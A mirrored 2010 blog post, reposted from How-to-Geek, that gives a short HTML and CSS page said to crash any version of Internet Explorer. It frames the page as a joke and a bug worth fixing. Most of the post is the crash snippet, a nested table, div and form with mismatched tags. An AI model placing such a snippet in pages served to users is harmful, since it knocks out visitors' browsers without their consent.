This is a mirror of official site: http://jasper-net.blogspot.com/

How to Crash Any Version of Internet Explorer with Simple HTML

| Thursday, November 4, 2010
We’ve already shown you why so many geeks hate Internet Explorer, and since it’s almost Halloween we figured we’d show you something really scary—how to crash any version of Internet Explorer with nothing more than HTML and CSS.

Note: we’re really not trying to bash on Internet Explorer—in fact, the latest beta version is really quite nice, but we figured we’d have some fun with this bug, and maybe somebody at Microsoft will fix this problem before the final release.

How to Crash Internet Explorer with HTML
Simply open up notepad or another text editor, paste in the following, and save it as SomeFilename.html.


<html><head>
<style type="text/css">
#a {
       margin:0 10px 10px;
}

#b {
       width:100%;
}

</style>
<title>IE Crasher</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>

Read more: How-to-geek

Posted via email from .NET Info

0 comments: